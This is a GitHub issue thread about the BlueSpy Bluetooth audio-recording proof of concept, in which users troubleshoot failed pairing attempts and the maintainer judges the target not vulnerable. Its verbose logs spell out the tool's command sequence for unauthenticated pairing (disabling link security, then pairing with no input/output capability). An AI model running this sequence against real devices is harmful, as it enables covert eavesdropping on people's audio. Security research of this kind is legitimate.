BR/EDR) failed. status 0x05 (Authentication Failed) about bluespy HOT 9 CLOSED

That true, sorry, after a reboot of the raspi:

┌──(kali㉿viper4)-[~/sources/BlueSpy]
└─$ python BlueSpy.py -a 60:AB:D2:43:0C:44
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
[!] Authentication error while trying to pair
[!] The device probably is not vulnerable...

from bluespy.

I have the same problem
my setup:

• VMware -> Kali
• USB Bluetooth dongle - https://fr.ugreen.com/products/ugreen-dongle-bluetooth-5-0-cle-usb-bluetooth
  I can discover it with bluetoothctl and connect to it with blueman-applet on my kali
  But with btmgmt i get 0x11 (Invalid Index)

[I] Avoiding authentication with xx:xx:xx:xx:xx:xx...
[I] Generating shared key...
Traceback (most recent call last):
  File "/home/kali/Documents/BlueSpy/BlueSpy.py", line 89, in <module>
    main()
  File "/home/kali/Documents/BlueSpy/BlueSpy.py", line 69, in main
    pair(BluezTarget(args.address, args.address_type), verbose=False)
  File "/home/kali/Documents/BlueSpy/core.py", line 95, in pair
    run_and_check(
  File "/home/kali/Documents/BlueSpy/core.py", line 73, in run_and_check
    raise Exception(f"Error while executing command {cmdline}", out)
Exception: ('Error while executing command sudo btmgmt pair -c 3 -t 0 xx:xx:xx:xx:xx:xx', 'Pairing with xx:xx:xx:xx:xx:xx (BR/EDR)\n\x1b[0;91mPairing failed with status 0x11 (Invalid Index)\n\x1b[0m')

##########
btmgmt pair -c 3 -t 0 xx:xx:xx:xx:xx:xx 
Pairing with xx:xx:xx:xx:xx:xx (BR/EDR)
Pairing failed with status 0x11 (Invalid Index)

from bluespy.

Thanks @srayneau for the report with the verbose flag and the independent test.

I am guessing that the target device is not vulnerable to the attack. To confirm this I would need a bluetooth dump.
You may perform a bluetooth capture with Wireshark using the bluetooth monitor interface while executing the PoC or you can use the btmon -w capture.pcap command.

from bluespy.

capture.pcap.zip

Hello,
Capture with btmon.

from bluespy.

Yes, as suspected, the target is not accepting the use of low security methods:

I will try to check for this particular case and adjust the output of the tool to not show an error.

Thank you!

from bluespy.

Merged a PR that should improve the output of the script for this particular case. Can you test the latest version? Thanks!

from bluespy.

Hello,

┌──(kali㉿viper4)-[~/sources/BlueSpy]
└─$ git pull
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 12 (delta 8), reused 7 (delta 5), pack-reused 0
Unpacking objects: 100% (12/12), 3.69 KiB | 210.00 KiB/s, done.
From https://github.com/TarlogicSecurity/BlueSpy
3b2ae77..678e1d5 main -> origin/main
Updating 3b2ae77..678e1d5
Fast-forward
BlueSpy.py | 9 +++++++--
core.py | 41 +++++++++++++++--------------------------
system.py | 43 +++++++++++++++++++++++++++++++++++++++++++
3 files changed, 65 insertions(+), 28 deletions(-)
create mode 100644 system.py

┌──(kali㉿viper4)-[~/sources/BlueSpy]
└─$ python BlueSpy.py -v -a 60:AB:D2:43:0C:44
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
[C] sudo btmgmt bondable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pairable true
hci0 Set Bondable complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt linksec false
hci0 Set Link Security complete, settings: powered ssp br/edr le secure-conn

[C] sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44
Pairing with 60:AB:D2:43:0C:44 (BR/EDR)
hci0 60:AB:D2:43:0C:44 type BR/EDR connect failed (status 0x04, Connect Failed)
Pairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x04 (Connect Failed)

Traceback (most recent call last):
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 94, in
main()
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 67, in main
paired = pair(target, verbose=args.verbose)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/sources/BlueSpy/core.py", line 90, in pair
raise e
File "/home/kali/sources/BlueSpy/core.py", line 79, in pair
run_and_check(
File "/home/kali/sources/BlueSpy/system.py", line 35, in run_and_check
raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44"', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connect failed (status 0x04, Connect Failed)\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x04 (Connect Failed)\n\x1b[0m')

┌──(kali㉿viper4)-[~/sources/BlueSpy]
└─$ python BlueSpy.py -a 60:AB:D2:43:0C:44
░█▀▄░█░░░█░█░█▀▀░█▀▀░█▀█░█░█░
░█▀▄░█░░░█░█░█▀▀░▀▀█░█▀▀░░█░░
░▀▀░░▀▀▀░▀▀▀░▀▀▀░▀▀▀░▀░░░░▀░░
░▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀░
Bluetooth audio recording tool by Tarlogic
[I] Avoiding authentication with 60:AB:D2:43:0C:44...
[I] Generating shared key...
Traceback (most recent call last):
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 94, in
main()
File "/home/kali/sources/BlueSpy/BlueSpy.py", line 67, in main
paired = pair(target, verbose=args.verbose)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/sources/BlueSpy/core.py", line 90, in pair
raise e
File "/home/kali/sources/BlueSpy/core.py", line 79, in pair
run_and_check(
File "/home/kali/sources/BlueSpy/system.py", line 35, in run_and_check
raise CommandValidationException(cmdline, out)
system.CommandValidationException: ('Error while executing command "sudo btmgmt pair -c 3 -t 0 60:ab:d2:43:0c:44"', 'Pairing with 60:AB:D2:43:0C:44 (BR/EDR)\nhci0 60:AB:D2:43:0C:44 type BR/EDR connect failed (status 0x04, Connect Failed)\n\x1b[0;91mPairing with 60:AB:D2:43:0C:44 (BR/EDR) failed. status 0x04 (Connect Failed)\n\x1b[0m')

from bluespy.

The original report was status 0x05 (Authentication Failed) while this latest log shows status 0x04 (Connect Failed)...

from bluespy.

I will close the issue as resolved. Thank you for your report!

from bluespy.